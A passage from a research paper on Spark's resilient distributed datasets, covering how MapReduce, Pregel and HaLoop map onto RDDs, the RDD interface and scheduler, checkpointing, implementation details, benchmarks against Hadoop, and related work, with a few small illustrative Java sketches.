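        double[][] xs = {{1, 2}, {2, 1}, {-1, -2}, {-2, -1}};
        double[] ys = {1, 1, -1, -1};
        double[] w = train(xs, ys, 5);
        for (int i = 0; i < xs.length; i++) {
            System.out.println("label " + ys[i] + " score " + dot(w, xs[i]));
        }
    }
}
```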

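Other iterative machine learning algorithms already implemented in Spark include k-means (which, like logistic regression, runs one map/reduce pair per iteration), expectation maximization (EM, which alternates between two different map/reduce steps), alternating least squares matrix factorization, and a collaborative filtering algorithm. Chu et al. have shown that iterated MapReduce can also be used to implement other common learning algorithms [11].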

4.2 MapReduce using RDDs

The MapReduce model [12] is easy to express with RDDs. Given an input dataset with elements of type T and two functions, myMap : T ⇒ List[(Ki, Vi)] and myReduce : (Ki, List[Vi]) ⇒ List[R], one can write:

data.flatMap(myMap)
    .groupByKey()
    .map((k, vs) => myReduce(k, vs))

If the job has a combiner, the code becomes:

data.flatMap(myMap)
    .reduceByKey(myCombiner)
    .map((k, v) => myReduce(k, v))

The reduceByKey operation performs partial aggregation on the mapper nodes, like MapReduce's combiners.
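
The flatMap / groupByKey / map pipeline can be mimicked on one machine to make the data flow concrete. The sketch below uses plain Java collections rather than Spark; mapReduce, tokenize, and the class name are hypothetical, and for simplicity myReduce returns a single result per key instead of a list.

```java
import java.util.AbstractMap;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.function.BiFunction;
import java.util.function.Function;

// Hypothetical single-machine sketch of MapReduce as flatMap + groupByKey + map.
final class MapReduceSketch {
    static <T, K, V, R> List<R> mapReduce(List<T> data,
                                          Function<T, List<Map.Entry<K, V>>> myMap,
                                          BiFunction<K, List<V>, R> myReduce) {
        // flatMap + groupByKey: emit (key, value) pairs and group the values by key
        Map<K, List<V>> grouped = new LinkedHashMap<>();
        for (T record : data) {
            for (Map.Entry<K, V> kv : myMap.apply(record)) {
                grouped.computeIfAbsent(kv.getKey(), k -> new ArrayList<>()).add(kv.getValue());
            }
        }
        // map: apply the reduce function to each (key, values) group
        List<R> out = new ArrayList<>();
        for (Map.Entry<K, List<V>> e : grouped.entrySet()) {
            out.add(myReduce.apply(e.getKey(), e.getValue()));
        }
        return out;
    }

    // Example map function for word count: one (word, 1) pair per word.
    static List<Map.Entry<String, Integer>> tokenize(String line) {
        List<Map.Entry<String, Integer>> pairs = new ArrayList<>();
        for (String word : line.split("\\s+")) {
            if (!word.isEmpty()) pairs.add(new AbstractMap.SimpleEntry<>(word, 1));
        }
        return pairs;
    }

    public static void main(String[] args) {
        List<String> counts = mapReduce(Arrays.asList("a b a", "b c"),
                MapReduceSketch::tokenize,
                (word, ones) -> word + "=" + ones.size());
        System.out.println(counts);
    }
}
```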

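4.3 Pregel using RDDs

Pregel [21] is a programming model for graph algorithms based on the BSP paradigm [32]. Programs run as a series of coordinated iterations called supersteps. In each superstep, every vertex runs a user function that can update the state associated with the vertex, mutate the graph topology, and send messages to other vertices for use in the next superstep. This model can express many graph algorithms, including shortest paths, bipartite matching, and PageRank.

We use PageRank to illustrate how Pregel works. The program's state is the current PageRank r of each vertex [7]. In each superstep, every vertex sends a contribution of r/n to each of its neighbors, where n is the number of its neighbors. At the start of the next superstep, each vertex updates its rank to α/N + (1 - α) * Σci, where the sum is over the contributions ci it received and N is the total number of vertices.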
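
One superstep of this update rule can be written out directly. The following sketch runs on a single machine with plain maps instead of a distributed graph; the class and method names are hypothetical, and it assumes every vertex appears as a key in both maps.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical single-machine sketch of one PageRank superstep.
final class PageRankSketch {
    // links maps each vertex to its out-neighbors; ranks holds the current rank r of each vertex.
    static Map<String, Double> superstep(Map<String, List<String>> links,
                                         Map<String, Double> ranks,
                                         double alpha) {
        int totalVertices = ranks.size(); // N in the formula
        Map<String, Double> contributions = new HashMap<>();
        for (Map.Entry<String, List<String>> e : links.entrySet()) {
            List<String> neighbors = e.getValue();
            double r = ranks.get(e.getKey());
            for (String neighbor : neighbors) {
                // each vertex sends r / n to every neighbor
                contributions.merge(neighbor, r / neighbors.size(), Double::sum);
            }
        }
        Map<String, Double> next = new HashMap<>();
        for (String vertex : ranks.keySet()) {
            // new rank = alpha / N + (1 - alpha) * (sum of received contributions)
            next.put(vertex, alpha / totalVertices
                    + (1 - alpha) * contributions.getOrDefault(vertex, 0.0));
        }
        return next;
    }

    public static void main(String[] args) {
        Map<String, List<String>> links = new HashMap<>();
        links.put("a", Arrays.asList("b"));
        links.put("b", Arrays.asList("c"));
        links.put("c", Arrays.asList("a"));
        Map<String, Double> ranks = new HashMap<>();
        for (String v : links.keySet()) ranks.put(v, 1.0 / 3);
        System.out.println(superstep(links, ranks, 0.15));
    }
}
```

On a three-vertex cycle with equal starting ranks, every vertex receives exactly one contribution of 1/3, so the ranks stay at 1/3 after the step.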

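Pregel partitions the input graph across the workers and stores it in their memory. At each superstep, the workers exchange messages through a MapReduce-like shuffle.

Pregel's communication pattern can be expressed with RDDs, as shown in Figure 3. The key idea is to store the vertex states and the messages sent at each superstep as RDDs and to group them by vertex ID to perform the shuffle communication (a cogroup operation). We then apply the user's function to the state and messages of each vertex ID (a mapValues operation) to produce a new RDD of (VertexID, (NewState, OutgoingMessages)) tuples, and split out the vertex states and messages for the next iteration (using mapValues and flatMap). The code looks as follows:

val vertices = // RDD of (ID, State) pairs
val messages = // RDD of (ID, Message) pairs
val grouped = vertices.cogroup(messages)
val newData = grouped.mapValues {
  (vert, msgs) => userFunc(vert, msgs)
  // returns (newState, outgoingMsgs)
}.cache()
val newVerts = newData.mapValues((v, ms) => v)
val newMsgs = newData.flatMap((id, (v, ms)) => ms)

Figure 3: Data flow for one iteration of Pregel implemented using RDDs. Boxes represent RDDs and arrows represent transformations.
An important aspect of this implementation is that the grouped, newData, and newVerts RDDs are partitioned in the same way as the input RDD, vertices. As a result, vertex states never leave the machines they started on, just as in the original Pregel, which reduces communication cost. This partitioning happens automatically, because cogroup and mapValues preserve the partitioning of their input RDD.

The full Pregel programming model includes several other facilities, such as combiners; Appendix A discusses how to implement them. The rest of this section discusses fault tolerance in Pregel and how to achieve the same fault tolerance while reducing the amount of data that must be checkpointed.

We have implemented a Pregel-like API on Spark in about 100 lines of Scala. Section 7.2 evaluates it with the PageRank algorithm.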

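4.3.1 Fault Tolerance for Pregel

Pregel currently checkpoints vertex states and messages to provide fault tolerance [21]. However, its authors also describe work on confined recovery, which rebuilds lost partitions individually by logging sent messages on other nodes, so that only the affected part of the data has to be recovered. RDDs can support both approaches.

With the implementation in Section 4.3, Spark can always rebuild the vertex and message RDDs using lineage, but recovery may be expensive because of the long lineage chain. Since each iteration's RDDs depend on those of the previous iteration, losing a node may cause the loss of every iteration's version of the state for some partition, which requires "cascaded re-execution" [20] to rebuild each lost partition in turn. To avoid this, users can periodically call save on the vertex and message RDDs to checkpoint their state to stable storage. Once this is done, Spark automatically recomputes only the lost partitions on a failure, rather than rolling back the whole program.

Finally, we note that RDDs can also reduce the amount of checkpointing required by expressing a more efficient checkpointing scheme. In many Pregel jobs, vertex states include both immutable and mutable components. In PageRank, for example, a vertex's list of neighbors never changes, but its rank does. In such cases, we can place the immutable data in a separate RDD from the mutable data, with a short lineage chain, and checkpoint only the mutable state. Figure 4 illustrates this approach.

Figure 4: Data flow for the optimized variant of Pregel using RDDs. Only the mutable state RDDs must be checkpointed; the immutable state can be rebuilt quickly from the input.
In PageRank, the immutable state (a list of neighbors) is much larger than the mutable state (a floating-point value), so this approach can greatly reduce overhead.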

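4.4 HaLoop using RDDs

HaLoop [8] is an extended version of Hadoop designed to improve the performance of iterative MapReduce programs. Applications written for HaLoop use the output of the reduce phase of one iteration as the input to the map phase of the next. Its loop-aware task scheduler ensures that, in every iteration, consecutive map and reduce tasks that process the same partition of data run on the same physical machine. Ensuring this inter-iteration locality reduces data transfer between machines and allows the data to be cached on local disk for reuse in later iterations.

We have implemented a HaLoop-like API on Spark, using RDDs to express HaLoop's optimizations; the library takes only 200 lines of Scala. Consistent partitioning across iterations is ensured through partitionBy, and the input and output of every phase are cached for use in later iterations.

4.5 Applications Not Suitable for RDDs

As discussed in Section 2.1, RDDs are best suited to applications that perform bulk transformations, applying the same operation to every element of a dataset. In these cases, RDDs can remember each transformation as one step in a lineage graph and recover lost partitions without having to log large amounts of data. RDDs are less suitable for applications that make asynchronous fine-grained updates to shared state, such as a storage system for a web application or an incremental web crawler and indexer. For those applications it is more efficient to use traditional approaches such as databases, RAMCloud [26], Percolator [27], and Piccolo [28]. Our goal is to provide an efficient programming model for batch analytics and to leave these asynchronous applications to specialized systems.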

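5. RDD Representation and Job Scheduling

We want to support a rich set of transformations on RDDs without modifying the scheduler for each one, and to capture lineage across all of them. To that end, we designed a small, common internal interface for RDDs.

In a nutshell, each RDD has (1) a set of partitions, which are atomic pieces of the dataset; (2) a set of dependencies on parent RDDs, which capture its lineage; (3) a function for computing the RDD from its parents; and (4) metadata about its partitioning scheme and data placement. For example, an RDD representing an HDFS file has one partition for each block of the file and knows which nodes each block is stored on. The result of a map on this RDD has the same partitions, and the map function is applied to the parent's data. Table 3 summarizes the RDD interface.

Operation	Meaning
partitions()	Return a list of Partition objects
preferredLocations(p)	List the nodes where partition p can be accessed faster due to data locality
dependencies()	Return a list of dependencies
iterator(p, parentIters)	Compute the elements of partition p given iterators for its parent partitions
partitioner()	Return metadata specifying whether the RDD is hash/range partitioned
Table 3: Internal interface of RDDs in Spark

The most interesting question in designing this interface is how to represent dependencies between RDDs. We found it useful to classify dependencies into two types: (1) narrow dependencies, where each partition of the child RDD depends on a constant number of partitions of the parent (independent of the data size); and (2) wide dependencies, where each partition of the child RDD can depend on data from all partitions of the parent. For example, map leads to a narrow dependency, while join leads to wide dependencies (unless the parents are hash-partitioned). Figure 5 shows other examples.

Figure 5: Examples of narrow and wide dependencies. Boxes represent RDDs and shaded rectangles represent partitions.
This distinction is useful for two reasons. First, narrow dependencies allow pipelined execution on one cluster node, which can compute all the parent partitions; for example, one can apply a map followed by a filter element by element. Wide dependencies, in contrast, require the data from all parent partitions to be available and to be shuffled across the nodes, as in MapReduce. Second, recovery after a node failure is more efficient with narrow dependencies, because only the lost parent partitions need to be recomputed, and they can be recomputed in parallel on different nodes. In a lineage graph with wide dependencies, a single failed node might cause the loss of some partition from all the ancestors of an RDD, requiring a complete re-execution.

Thanks to this common interface, most transformations in Spark can be implemented in fewer than 20 lines of code. Section 5.1 sketches some examples, Section 5.2 discusses how the RDD interface is used for scheduling, and Section 5.3 discusses when it makes sense to checkpoint data in RDD-based programs.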

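5.1 Examples of RDD Implementations

HDFS files: The input RDDs in our examples so far have all been files in HDFS. For these RDDs, partitions returns one partition for each block of the file (with the block's offset stored in each Partition object), preferredLocations gives the nodes the block is on, and iterator reads the block.

map: Calling map on any RDD returns a MappedRDD object. This object has the same partitions and preferred locations as its parent, but applies the function passed to map to the parent's records in its iterator method.

union: Calling union on two RDDs returns an RDD whose partitions are the union of those of the parents. Each child partition is computed through a narrow dependency on the corresponding parent. (Note that union does not drop duplicate values; it is equivalent to SQL's UNION ALL.)

sample: Sampling is similar to mapping, except that the RDD stores a random number generator seed for each partition so that it can deterministically sample the parent's records.

join: Joining two RDDs may lead to two narrow dependencies (if both are hash-partitioned or range-partitioned with the same partitioner), two wide dependencies, or a mix (if one parent has a partitioner and the other does not).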

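5.2 Spark Job Scheduler

The scheduler uses the structure of RDDs to find an efficient execution plan for each action. Its interface is a runJob function that takes an RDD to work on, a set of partitions of interest, and a function to run on those partitions. This interface is sufficient to express all the actions in Spark (count, collect, save, and so on).

Overall, our scheduler is similar to Dryad's, but it additionally takes into account which partitions of RDDs are cached in memory. The scheduler examines the lineage graph of the target RDD to build a directed acyclic graph (DAG) of stages. Each stage contains as many pipelined transformations with narrow dependencies as possible. The boundaries of the stages are either the shuffle operations required by wide dependencies or cached partitions, which can short-circuit the computation of a parent RDD. Figure 6 shows an example. We launch tasks to compute the missing partitions of each stage once its parents have finished.

Figure 6: Example of how Spark computes job stages. Boxes with solid outlines are RDDs; shaded rectangles are partitions, drawn in black if they are cached. To run an action on RDD G, the scheduler builds stages at wide dependencies and pipelines narrow transformations inside each stage. In this case stage 1 does not need to run, because B is already cached, so only stages 2 and 3 are run.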
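
The way stages are cut at wide dependencies can be sketched for the simplest case, a linear chain of transformations. The code below is a hypothetical illustration, not Spark's scheduler: it treats a fixed set of operation names as always requiring a shuffle (in reality join is narrow when both parents are co-partitioned) and it ignores cached partitions.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

// Hypothetical sketch of stage construction for a linear chain of transformations.
final class StagePlanner {
    // Assumption for this sketch: these operations always need a shuffle.
    static final Set<String> WIDE =
            new HashSet<>(Arrays.asList("groupByKey", "reduceByKey", "join", "sort"));

    // Groups consecutive narrow transformations into one stage and starts
    // a new stage at every wide transformation.
    static List<List<String>> stages(List<String> chain) {
        List<List<String>> stages = new ArrayList<>();
        List<String> current = new ArrayList<>();
        for (String op : chain) {
            if (WIDE.contains(op) && !current.isEmpty()) {
                stages.add(current); // shuffle boundary: close the running stage
                current = new ArrayList<>();
            }
            current.add(op);
        }
        if (!current.isEmpty()) stages.add(current);
        return stages;
    }

    public static void main(String[] args) {
        System.out.println(stages(Arrays.asList(
                "map", "filter", "groupByKey", "mapValues", "join", "map")));
    }
}
```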

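The scheduler places tasks based on data locality to minimize communication. If a task needs to process a cached partition, it is sent to a node that holds that partition. Otherwise, if the partition to be processed has preferred locations (for example, because of data placement in HDFS), the task is sent to one of those nodes.

For wide dependencies (that is, shuffle dependencies), we currently materialize intermediate records on the nodes holding the parent partitions to simplify fault recovery, much as MapReduce materializes map outputs.

If a task fails, we re-run it on another node as long as its stage's parent partitions are still available. If some stages have become unavailable (for example, because a map-side output of a shuffle was lost), we resubmit tasks to compute the missing partitions of those stages.

Finally, the lookup action, which lets the user fetch an element from a hash-partitioned or range-partitioned RDD by its key, poses an interesting design question. When lookup is called by the driver program, the existing scheduler interface can be used to build just the partition that contains the key. Tasks running on the cluster can also call lookup, however, which lets them treat the RDD as a large distributed hash table. In this case, the dependency between the task and the RDD being looked up is not captured explicitly (because the workers are the ones calling lookup), so if no node holds the relevant partition in its cache, the task has to tell the scheduler which RDD to compute to complete the lookup.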

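5.3 Checkpointing

Although the lineage information in RDDs can always be used for failure recovery, recovery may be time-consuming for RDDs with long lineage chains. In the Pregel jobs of Section 4.3, for example, the vertex states and messages of each iteration depend on the previous iteration, so the lineage chain is long. It can therefore be helpful to periodically checkpoint RDDs with long lineage chains to stable storage.

In general, checkpointing is useful for RDDs with long lineage graphs that contain wide dependencies. In these cases, a node failure in the cluster may cause the loss of some slice of data from each parent RDD, requiring a full recomputation [20]. In contrast, for RDDs with narrow dependencies on data in stable storage, such as the points in the logistic regression example (Section 4.1) and the immutable vertex states in the optimized Pregel variant (Section 4.3.1), checkpointing may never be worthwhile.

Spark currently provides an API for checkpointing but leaves the decision of which data to checkpoint to the user. In future work we plan to implement automatic checkpointing, using a cost-benefit analysis to pick the best place to cut the RDD lineage graph.

Note that because RDDs are read-only, they are simpler to checkpoint than general shared memory: consistency is not a concern, so RDDs can be written out in the background without the overhead of copy-on-write schemes, distributed snapshots, or program pauses.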

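6. Implementation

We have implemented Spark in about 10,000 lines of Scala. The system can use any Hadoop data source (for example, HDFS or HBase) as input, which makes it easy to integrate into Hadoop environments. Spark is implemented as a library and does not require any changes to the Scala compiler.

We discuss three aspects of the implementation: (1) the modifications to the Scala interpreter that allow Spark to be used interactively (6.1); (2) cache management (6.2); and (3) our debugging tool, rddbg (6.3).

6.1 Interpreter Integration

Like Ruby and Python, Scala has an interactive shell. Given the low latencies that in-memory data makes possible, we wanted to let users run Spark interactively from the interpreter as a large-scale parallel data mining tool.

The Scala interpreter normally works by compiling a class for each line the user types, loading it into the JVM, and invoking a function on it. This class is a singleton object that contains the variables or functions defined on that line and runs the line's code in an initialization function. For example, if the user types var x = 5 followed by println(x), the interpreter defines a class called Line1 containing x and compiles the second line to println(Line1.getInstance().x).

We made two changes to the interpreter in Spark:

Class shipping: The interpreter serves the bytecode of the classes it creates over HTTP, so that worker nodes can fetch the bytecode for the class created on each line.
Modified code generation: Normally, the singleton object created for each line of code is accessed through a static method on its class. This means that when we serialize a closure referencing a variable defined on a previous line, such as Line1.x in the example above, Java does not trace through the object graph to ship the Line1 instance wrapping x, so the worker nodes never receive x. We changed the code generation logic to reference the instance of each line object directly. Figure 7 shows how the interpreter translates a set of lines typed by the user into Java objects.

Figure 7: How the Spark interpreter translates two lines entered by the user into Java objects.
We have found the Spark interpreter useful for processing large traces obtained as part of our research and for exploring datasets stored in HDFS. We also plan to use it as a basis for interactive tools that support higher-level data analytics languages, such as variants of SQL and Matlab.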

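6.2 Cache Management

Worker nodes cache RDD partitions in memory as Java objects. Because most operations are scans, we use an LRU (least recently used) replacement policy at the level of RDDs; that is, we never evict a partition of an RDD in order to load another partition of the same RDD. This simple policy has worked well for most user applications so far. In addition, the cache operation accepts a parameter that sets an RDD's cache priority.

6.3 rddbg: A Tool for Debugging RDD Programs

RDDs were designed to be deterministically recomputable for fault tolerance, and this property also makes debugging easier. We built a tool called rddbg that uses the lineage information logged by a program to let the user (1) rebuild any RDD created by the program and query it interactively, and (2) re-run any task of the job in a single-process Java debugger (such as jdb) by feeding in the recomputed RDD partitions it depended on.

We stress that rddbg is not a full replay debugger: in particular, it does not replay nondeterministic code or behavior. It is nevertheless useful for finding logic bugs as well as performance bugs where one task is consistently slow (for example, because of skewed data or unusual input).

As an example, we used rddbg to fix a bug in a user's spam classification job, in which every iteration produced only zero values. Re-executing a reduce task in the debugger quickly showed that the input weight vector (stored in a custom sparse vector class) was unexpectedly empty. Because reading from an uninitialized sparse vector always returns zero, the runtime never threw an exception. Setting a breakpoint in the vector class and running the task again quickly led to the breakpoint, where we found that an array field of the vector class was null. This pinned down the bug: the data field of the sparse vector class had mistakenly been declared transient, so its contents were dropped during serialization.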
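
The failure mode in this story is easy to reproduce with standard Java serialization. The sketch below uses a hypothetical SparseVectorSketch class (not the user's actual class): a field marked transient is skipped when the object is written, so it comes back as null after a round trip, much as the weight vector arrived empty on the workers.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical vector class reproducing the bug: the data field is transient.
final class SparseVectorSketch implements Serializable {
    private static final long serialVersionUID = 1L;

    transient double[] values; // bug: transient fields are skipped by Java serialization

    SparseVectorSketch(double[] values) {
        this.values = values;
    }
}

final class TransientFieldDemo {
    // Serializes and deserializes the vector, as shipping it to another node would.
    static SparseVectorSketch roundTrip(SparseVectorSketch vector) {
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
                out.writeObject(vector);
            }
            try (ObjectInputStream in = new ObjectInputStream(
                    new ByteArrayInputStream(bytes.toByteArray()))) {
                return (SparseVectorSketch) in.readObject();
            }
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException("serialization round trip failed", e);
        }
    }

    public static void main(String[] args) {
        SparseVectorSketch copy = roundTrip(new SparseVectorSketch(new double[] {0.5, 1.5}));
        System.out.println("values after round trip: " + copy.values);
    }
}
```

Removing the transient modifier is enough for the array to survive the round trip.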

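rddbg adds very little overhead to a program's execution. The program already has to serialize the closures associated with each RDD and send them over the network; with rddbg, it simply also logs these closures to disk.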

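7. Evaluation

We evaluated Spark and RDDs through a series of experiments on Amazon EC2 [1], comparing them against Hadoop and against benchmarks of user applications. Overall, our results show the following:
(1) Spark outperforms Hadoop by more than 20x in iterative machine learning applications. The speedup comes from keeping data in memory and from avoiding deserialization by caching Java objects.
(2) Applications written by our users perform well. For example, Spark produced an analytics report more than 40x faster than Hadoop.
(3) When nodes fail, Spark can recover quickly by rebuilding only the lost RDD partitions.
(4) Spark can be used to query a 1 TB dataset interactively with latencies of 5-7 seconds.
We start by benchmarking an iterative machine learning application (7.1) and PageRank (7.2) against Hadoop. We then evaluate fault recovery in Spark (7.3) and its behavior when the working set does not fit in the cache (7.4). Finally, we discuss results for user applications (7.5) and interactive data mining (7.6).
Unless otherwise noted, our experiments used m1.xlarge EC2 nodes with 4 cores and 15 GB of RAM, and HDFS for persistent storage with 256 MB blocks. Before each job, we cleared the operating system's buffer cache on every node in the cluster so that disk read times were measured accurately.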

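7.1 Iterative Machine Learning Applications

We implemented two iterative machine learning (ML) applications, logistic regression and k-means, and compared the performance of the following systems:

Hadoop: The Hadoop 0.20.0 stable release.
HadoopBinMem: A Hadoop deployment that preprocesses the input in the first iteration, converting it into a low-overhead binary format to eliminate text parsing in later iterations, and stores it in an in-memory HDFS instance.
Spark: An RDD-based system that caches Java objects in the first iteration to eliminate parsing and deserialization overhead in later iterations.

We ran logistic regression and k-means on the same dataset under the same conditions: 10 iterations over a 100 GB input dataset (Table 4) on 25-100 machines, using 400 tasks (one for each 256 MB block of input). The key difference between the two jobs is the amount of computation they perform per byte per iteration. The iteration time of k-means is dominated by computation (updating the cluster coordinates), while logistic regression is less compute-intensive and therefore more sensitive to the time spent in deserialization and parsing.
Since typical learning algorithms need tens of iterations to converge, we report times for the first iteration and for subsequent iterations separately. We find that caching RDDs in memory greatly speeds up the subsequent iterations.

Application	Data description	Size
Logistic regression	1 billion 9-dimensional points	100 GB
K-means	1 billion 10-dimensional points (k = 10)	100 GB
PageRank	Link graph of 4 million Wikipedia articles	49 GB
Interactive data mining	Wikipedia page view logs (2008-10 to 2009-4)	1 TB
Table 4: Data used for benchmarking Spark

First iteration. All three systems read text input from HDFS in their first iteration. As the "First Iteration" bars in Figure 9 show, Spark was faster than Hadoop in this experiment, mainly because of the signaling overhead of Hadoop's heartbeat protocol between its distributed components. HadoopBinMem was the slowest, because it ran an extra MapReduce job to convert the data to binary format.

Figure 8: Running times for iterations after the first one in Hadoop, HadoopBinMem, and Spark.

Subsequent iterations. Figure 9 shows the average time of subsequent iterations, and Figure 8 compares these times for different cluster sizes. For logistic regression on 100 nodes, Spark is 25.3x and 20.7x faster than Hadoop and HadoopBinMem, respectively. As Figure 8(b) shows, Spark is only 1.9x and 3.2x faster than Hadoop and HadoopBinMem for k-means, because k-means is dominated by computation (adding more nodes helps increase the speedup).

In subsequent iterations, Hadoop still read text input from HDFS, so its iteration times did not improve noticeably after the first iteration. By using a pre-converted SequenceFile (Hadoop's built-in binary file format), HadoopBinMem saved the parsing cost in subsequent iterations but still incurred other overheads, such as reading each SequenceFile from HDFS and converting it into Java objects. Because Spark reads Java objects directly from the cached RDD, its iteration time drops substantially and scales linearly with cluster size.

Figure 9: Duration of the first and later iterations.
Understanding the speedup. We were surprised to find that Spark outperformed even Hadoop with in-memory storage of binary data (HadoopBinMem), by a margin of up to 20x. Hadoop was slower for several reasons:

1. The minimum overhead of the Hadoop software stack
2. The overhead of the HDFS stack while reading data
3. The cost of converting binary records into usable in-memory Java objects

To measure (1), we ran no-op Hadoop jobs and found that these took at least 25 seconds just for job setup, starting tasks, and cleanup. Regarding (2), we found that HDFS performs multiple memory copies and a checksum to serve each block.

To measure (3), we ran microbenchmarks on a single node that computed logistic regression on 256 MB of input; Table 5 shows the results. First, the difference between the in-memory HDFS file and the in-memory local file shows that reading through the HDFS interface adds a 2-second overhead, even when the data is in memory on the local machine. Second, the difference between text and binary input indicates a parsing overhead of 7 seconds. Finally, converting the pre-parsed binary data into in-memory Java objects takes 3 seconds. These overheads accumulate as each node processes multiple blocks. By caching RDDs as Java objects in memory, Spark needs only about 3 seconds.

Input	In-memory HDFS file	In-memory local file	Cached RDD
Text input	15.38 (0.26)	13.13 (0.26)	2.93 (0.31)
Binary input	8.38 (0.10)	6.86 (0.02)	2.93 (0.31)
Table 5: Logistic regression iteration times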

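7.2 PageRank

Using a 49 GB Wikipedia dump stored in HDFS, we compared the performance of our RDD-based Pregel implementation with Hadoop for PageRank. We ran 10 iterations of the PageRank algorithm on a link graph of about 4 million articles. Figure 10 shows that Spark was more than 2x faster than Hadoop on 30 nodes; hash-partitioning the input improved the speedup to 2.6x, and introducing combiners increased it further to 3.6x. These results also scaled accordingly when the cluster grew to 60 nodes.

Figure 10: Comparison of iteration times.

7.3 Fault Recovery

Using the k-means application, we evaluated the cost of rebuilding RDD partitions from lineage after a single node failure. Figure 11 compares the running times of 10 iterations of k-means on a 75-node cluster in normal operation with a run in which one node fails at the start of the 6th iteration. Without any failure, each iteration consisted of 400 tasks working on 100 GB of data.

Figure 11: Iteration times for k-means in the presence of a single node failure.
Until the end of the 5th iteration, each iteration took about 58 seconds. In the 6th iteration, one node was killed, which terminated the tasks running on it and lost the partitions cached there. The Spark scheduler re-ran these tasks in parallel on other nodes, where they re-read the corresponding input data, rebuilt the RDDs from lineage, and cached them; this increased the iteration time to 80 seconds. Once the lost RDD partitions had been rebuilt, the average iteration time dropped back to 58 seconds.

7.4 Behavior with Insufficient Memory

So far, we ensured that every node in the cluster had enough memory to cache the RDDs used across iterations. How does Spark behave when there is not enough memory to cache a job's working set? In this experiment, we configured Spark to limit the memory available for caching RDDs on each node and ran logistic regression under different cache configurations. Figure 12 shows the results: performance degrades gracefully as the cache shrinks.

Figure 12: Performance of logistic regression on Spark.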

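7.5 User Applications Built on Spark

In-memory analytics. Conviva, a video distribution company, used Spark to greatly accelerate an analytics report that it computes for its customers. The report was previously produced with about 20 Hive [3] queries on Hadoop. These queries all worked on the same subset of the data (records matching a customer-provided filter) but performed aggregations (SUM, AVG, COUNT DISTINCT, and so on) over different grouping fields, which required separate MapReduce jobs. With Spark, the company only has to load the relevant data into memory once and then run the aggregations. A report on 200 GB of compressed data that took 20 hours on a Hadoop cluster now runs in 30 minutes on two Spark nodes with 96 GB of RAM. This 40x speedup comes mainly from not having to decompress and filter the data again for each job.

Traffic modeling. In the Mobile Millennium project at Berkeley [17], researchers parallelized a learning algorithm for inferring road traffic congestion from sporadic automobile GPS measurements. The data covered a road network of 10,000 links in a metropolitan area, together with 600,000 samples collected by GPS-equipped automobiles, each recording the travel time between two locations (a trip may span multiple road links). Using a traffic model, the system can estimate congestion by inferring the expected travel time across individual road links. The researchers implemented an iterative EM algorithm in Spark, which broadcasts the road network information to the worker nodes and performs a reduceByKey between the E and M steps. The application was scaled from 20 to 80 nodes (with 4 cores each), as shown in Figure 13(a).

Figure 13: Per-iteration running time of (a) the traffic modeling application and (b) the social network spam classification built on Spark.
Social network spam classification. The Monarch project at Berkeley [31] used Spark to identify link spam in Twitter messages. They implemented a logistic regression classifier on Spark similar to the example in Section 7.1, but used a distributed reduceByKey to sum the gradient vectors in parallel. Figure 13(b) shows the results of training the classifier on a 50 GB subset of the data: 250,000 URLs and at least 10^7 features (dimensions) related to the network and content properties of the page at each URL. Scaling with the number of nodes is not as close to linear as for the traffic application, mainly because of a higher fixed communication cost per iteration.

7.6 Interactive Data Mining

To demonstrate Spark's ability to interactively process large datasets, we used it to analyze 1 TB of Wikipedia page view logs, from 2008-10 to 2009-4, on 100 m2.4xlarge EC2 instances (8 cores and 68 GB of RAM each). We ran simple queries over the entire input to find the total number of views of (1) all pages, (2) pages whose titles exactly match a given word, and (3) pages whose titles partially match a word.

Figure 14 shows the response times of the queries on the full dataset, half of the dataset, and one-tenth of it. Even at 1 TB, queries on Spark took only 5-7 seconds, far faster than working with on-disk data: querying the 1 TB dataset from disk took 170 seconds. This shows that RDD caching makes Spark a powerful tool for interactive data mining.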

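8. Related Work

Distributed shared memory (DSM). RDDs can be viewed as an abstraction built on DSM research [24]. As discussed in Section 2.5, RDDs provide a more restricted programming model than DSM, but one that lets datasets be rebuilt efficiently when nodes fail. DSM systems achieve fault tolerance through checkpointing [19], whereas Spark rebuilds lost RDD partitions using lineage. These partitions can be recomputed in parallel on different nodes, without rolling the whole program back to a checkpoint and re-running it. RDDs can also push computation to the data as in MapReduce [12], and they can mitigate stragglers through speculative execution, which is difficult to implement in a general DSM system.

In-memory cluster computing. Piccolo [28] is a cluster programming model based on mutable, in-memory distributed tables. Because Piccolo allows reads and writes to individual table entries, its recovery mechanism is similar to DSM's: it requires checkpoints and rollback, and it does not support speculative execution. Piccolo also does not provide higher-level data flow operators such as groupBy and sort, so users have to read and write table cells directly to implement them. Piccolo is thus a lower-level programming model than Spark, although a higher-level one than DSM.

RAMCloud [26] was proposed as a storage system for web applications. It likewise provides fine-grained reads and writes, so it has to log data to provide fault tolerance.

Data flow systems. RDDs build on the "parallel collection" programming model of DryadLINQ [34], Pig [25], and FlumeJava [9], and support applications with working sets efficiently by letting users explicitly keep unserialized objects in memory, control partitioning, and perform random lookups by key. RDDs retain the high-level programming style of those data flow systems, which is familiar to developers, while supporting a broader class of applications. The extensions that RDDs add are conceptually simple, yet as far as we know Spark is the first system to add these capabilities to a DryadLINQ-like programming model in order to support applications with working sets efficiently.

Several specialized systems have been developed for applications with working sets, including Twister [13] and HaLoop [8], which implement an iterative MapReduce model, and Pregel [21], which provides a BSP execution model for graph applications. RDDs are a more general abstraction that can express iterative MapReduce, Pregel, and applications that these systems do not handle, such as interactive data mining. In particular, they let programmers choose dynamically which operations to run on RDDs (for example, looking at the result of one query to decide which query to run next) instead of supplying a fixed set of steps to iterate, and they support more types of transformations.

Finally, Dremel [22] is a low-latency query engine for large on-disk datasets that stores nested record data in a column-oriented format. Data in the same format could be stored as RDDs and used in Spark, but Spark also offers the ability to load data into memory for faster queries.

Lineage. Capturing lineage or provenance information for data has long been a research topic in scientific computing and databases, for applications such as explaining results, allowing them to be reproduced by others, and recomputing data when a bug is found in a workflow or a dataset is lost. We refer the reader to [6] and [10] for surveys of this work. RDDs provide a restricted programming model in which fine-grained lineage is inexpensive to capture, so that it can be used for fault recovery.

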